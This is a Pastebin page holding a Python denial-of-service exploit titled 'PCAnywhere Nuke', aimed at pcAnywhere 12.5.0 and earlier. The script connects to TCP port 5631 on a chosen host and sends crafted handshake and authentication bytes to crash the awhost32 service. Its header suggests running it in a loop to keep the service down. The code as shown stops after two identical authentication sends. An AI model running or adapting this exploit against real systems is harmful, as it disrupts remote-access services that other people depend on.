G2A Many GEOs
SHARE
TWEET

PCAnywhere Nuke

a guest Feb 17th, 2012 7,957 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. !/usr/bin/python
  2.  
  3. '''
  4. Exploit Title:  PCAnywhere Nuke
  5. Date: 2/16/12
  6. Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
  7. Version:  PCAnyWhere  (12.5.0 build 463) and below
  8. Tested on: Windows
  9. Description: The following code will crash the awhost32 service. It'll be respawned
  10. so if you want to be a real  pain you'll need to loop this.. my initial impressions
  11. are that controlling execution will be a pain.
  12. '''
  13.  
  14. import sys
  15. import socket
  16. import argparse
  17.  
  18.  
  19. if len(sys.argv) != 2:
  20.     print "[+] Usage: ./pcNuke.py <HOST>"
  21.     sys.exit(1)
  22. HOST = sys.argv[1]
  23. PORT = 5631              
  24. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  25. s.connect((HOST, PORT))
  26.  
  27.    
  28. # HELLO!
  29. s.send("\x00\x00\x00\x00")
  30. buf = s.recv(1024)
  31.  
  32.  
  33. # ACK!
  34. s.send("\x6f\x06\xfe")
  35. buf = s.recv(1024)
  36.  
  37.  
  38. # Auth capability part 1
  39. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
  40. # Auth capability part 2
  41. s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top